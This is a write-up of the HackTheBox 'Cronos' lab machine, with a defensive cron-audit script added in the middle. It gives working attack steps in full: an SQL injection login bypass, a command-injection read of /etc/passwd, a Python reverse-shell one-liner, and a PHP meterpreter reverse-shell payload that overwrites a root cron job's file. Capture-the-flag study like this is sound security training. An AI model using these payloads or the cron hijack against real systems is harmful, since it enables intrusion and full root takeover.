[hackthebox]Cronos

Introduction

I have not developed a hacker's hunch yet and hope to keep learning new techniques so that I can develop one soon. I am following a few walkthroughs and HTB's official guide; to be honest, if I were to start hacking this machine unaided I think I would take two weeks to find the root flag and another two weeks to get the user's flag.

All machines have the same goal: get the user's flag from user.txt and root's flag from root.txt.

Doing HackTheBox machines I have learned things I had never used before in system administration.

The HackTheBox exercises also help me understand the consequences of misconfigurations in a system.

Pre-requisites

  1. Very simple SQL injection techniques, which can be learned from DVWA. Read this for the different comment syntaxes supported.
  2. Port scanning with nmap.
  3. Basic command injection, which can also be learned from DVWA.

What have I learned?

  1. DNS subdomain enumeration with dig.
  2. Checking the scheduled jobs in crontab to find out whether any of them can be exploited.
  3. Dropping into a shell when connected with nc by using a named pipe.
  4. Preserving PHP variables when echoing a payload and piping it to tee.

Enumeration with nmap

nmap -sV -sC -oN cronos 10.10.10.13 -vvv

-sC runs the default script set, which also tests the discovered services for known vulnerabilities.

cronos1
There are DNS (tcp/53) and HTTP (tcp/80) services, which are good attack surfaces. SSH itself is not so easy: there is a username enumeration vulnerability, but I would rather avoid brute forcing, as it takes a long time if the password is strong and it depends on a wordlist of weak passwords.

Checking the web

cronos2
Although this is the default Apache page, I cannot find any exploit in this static page. I tried http://10.10.10.13/../../etc/apache2/apache2.conf to see whether I could read outside its document root /var/www, but I could not; see the screenshot below.
cronos3

On HTB machines, if there is a web service, always try to fuzz it with dirb, dirbuster or gobuster. I will use dirb http://10.10.10.13, which uses the default wordlist /usr/share/wordlists/dirb/common.txt.

cronos4

After some time no other directories are found in the web root, see below:
cronos19

Check the DNS service

While waiting for the dirb results I will check the tcp/53 service.
Check whether 10.10.10.13 has a reverse entry.
cronos6
The FQDN of 10.10.10.13 is ns1.cronos.htb, so it is assumed that cronos.htb is the domain. Can I enumerate more subdomains from the DNS server to find more entries?

In nslookup, do set q=any and see what the results are...
cronos7
So admin.cronos.htb is a mail server... are there more subdomains?

Use dig to find more A records in the cronos.htb domain: dig @dns_address domain_name axfr, where axfr requests a zone transfer.

cronos8
So apparently the cronos machine's DNS server allows zone transfers to anyone and returned all of its entries.

Back to testing the web

The dirb enumeration had not finished while I was checking the FQDNs discovered from cronos' DNS.

Because I am not changing my own DNS server, I will add the newly found subdomains to the hosts file:
echo "10.10.10.13 www.cronos.htb admin.cronos.htb" | tee -a /etc/hosts

cronos9

cronos10
Looking at the page source, there are only links to external websites.

cronos11
http://admin.cronos.htb is a login page.
I tested ' or 1=1# in the password field and could not get anything, but testing ' or 1=1# in the username field logged me in.
cronos12
cronos13

Test whether the field is vulnerable to command injection by entering 8.8.8.8| cat /etc/passwd

For the reverse connection I set up a listener with netcat: nc -lvnp 4444
To test whether the server has Python, submit python -c "print('python exists')"; if your text appears on the web page, there is a Python interpreter.
This is my payload to connect back to my netcat listener:
python -c "import os;import socket;import subprocess;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(('10.10.14.5',4444));os.dup2(s.fileno(),0),os.dup2(s.fileno(),1),os.dup2(s.fileno(),2);subprocess.call(['/bin/sh', '-i']);"

cronos17

Get the user flag

cronos18

Privilege escalation

I am trying to use sudo -l but I cannot get the permission list...
cronos20

To be honest I was stuck here... so I read the guide, and it turned out that crontab has a job that is executed by root...
cronos21

The owner of the file artisan is www-data, which means the user I gained can modify the file.
cronos22

Looking into the PHP file (artisan), the application exits at the end, hence I cannot simply append the reverse shell code to the PHP file.
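As an added example (not from the original post), here is the defender-side check for exactly this misconfiguration: a cron job that runs as root but executes a file owned by, or writable by, a less-privileged user. The crontab lines and script files built in demo are constructed samples, and the TRUSTED_USER parameter is my own addition.

```shell
#!/bin/sh
# find_weak_cron_targets CRONTAB_FILE [TRUSTED_USER]
# Reads a system crontab (m h dom mon dow user command) and prints "<path> <reason>"
# for every root job that references a regular file not owned by TRUSTED_USER
# (default root) or that is group- or world-writable. Constructed example.
find_weak_cron_targets() {
    crontab_file=$1
    trusted=${2:-root}
    set -f                              # no globbing: schedule fields are '*'
    while IFS= read -r line; do
        case $line in ''|'#'*) continue ;; esac
        set -- $line
        [ $# -ge 7 ] || continue        # env lines such as SHELL=/bin/sh
        [ "$6" = root ] || continue     # only jobs that run as root
        shift 6                         # $@ is now the command and its arguments
        for tok in "$@"; do
            case $tok in /*) ;; *) continue ;; esac   # absolute paths only
            [ -f "$tok" ] || continue   # skips /dev/null, directories, missing files
            owner=$(stat -c %U "$tok")
            mode=$(stat -c %a "$tok")
            if [ "$owner" != "$trusted" ]; then
                echo "$tok owned-by-$owner"
            else
                case $mode in           # group or other digit with the write bit set
                    *[2367]?|*[2367]) echo "$tok mode-$mode" ;;
                esac
            fi
        done
    done < "$crontab_file"
    set +f
}

# demo: constructed crontab plus two target scripts in a temp dir. The sandbox
# user is passed as TRUSTED_USER because it owns the files it just created; on a
# real host run the function against /etc/crontab with the default (root).
demo() {
    dir=$(mktemp -d)
    printf '#!/bin/sh\necho ok\n' > "$dir/safe.sh";  chmod 755 "$dir/safe.sh"
    printf '#!/bin/sh\necho ok\n' > "$dir/loose.sh"; chmod 777 "$dir/loose.sh"
    cat > "$dir/crontab" <<EOF
# constructed sample, shaped like the artisan job above
SHELL=/bin/sh
* * * * * root php $dir/loose.sh schedule:run >> /dev/null 2>&1
*/5 * * * * root $dir/safe.sh
0 3 * * * nobody $dir/loose.sh
EOF
    find_weak_cron_targets "$dir/crontab" "$(id -un)"
    rm -rf "$dir"
}
```

Only loose.sh is reported (mode-777); safe.sh is owner-only writable and the nobody job is ignored because it does not run as root.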

To make a PHP meterpreter reverse shell, use msfvenom:
msfvenom -p php/meterpreter/reverse_tcp -o venom.php on your Kali Linux machine. You need to edit the IP address and the port, and also change the single quotes to double quotes. This is the payload I used:

echo '/*<?php /**/ error_reporting(0); $ip = "10.10.14.5"; $port = 1234; if (($f = "stream_socket_client") && is_callable($f)) { $s = $f("tcp://{$ip}:{$port}"); $s_type = "stream"; } if (!$s && ($f = "fsockopen") && is_callable($f)) { $s = $f($ip, $port); $s_type = "stream"; } if (!$s && ($f = "socket_create") && is_callable($f)) { $s = $f(AF_INET, SOCK_STREAM, SOL_TCP); $res = @socket_connect($s, $ip, $port); if (!$res) { die(); } $s_type = "socket"; } if (!$s_type) { die("no socket funcs"); } if (!$s) { die("no socket"); } switch ($s_type) { case "stream": $len = fread($s, 4); break; case "socket": $len = socket_read($s, 4); break; } if (!$len) { die(); } $a = unpack("Nlen", $len); $len = $a["len"]; $b = ""; while (strlen($b) < $len) { switch ($s_type) { case "stream": $b .= fread($s, $len-strlen($b)); break; case "socket": $b .= socket_read($s, $len-strlen($b)); break; } } $GLOBALS["msgsock"] = $s; $GLOBALS["msgsock_type"] = $s_type; if (extension_loaded("suhosin") && ini_get("suhosin.executor.disable_eval")) { $suhosin_bypass=create_function("", $b); $suhosin_bypass(); } else { eval($b); } die();' | tee /var/www/laravel/venom.php; mv /var/www/laravel/venom.php /var/www/laravel/artisan

The entire PHP code has to be enclosed in single quotes; at first I was using double quotes, but then the PHP variables with a $ disappeared because the shell expanded them. The PHP code itself must use only double quotes, because a single quote inside the PHP would terminate the shell's single-quoted string and be removed.

cronos26

To set up the meterpreter handler in msfconsole, first use exploit/multi/handler, then set payload php/meterpreter/reverse_tcp, which is the same payload I used to generate the PHP payload with msfvenom. I set lhost and lport, then type run to start listening for the incoming meterpreter connection.
cronos27
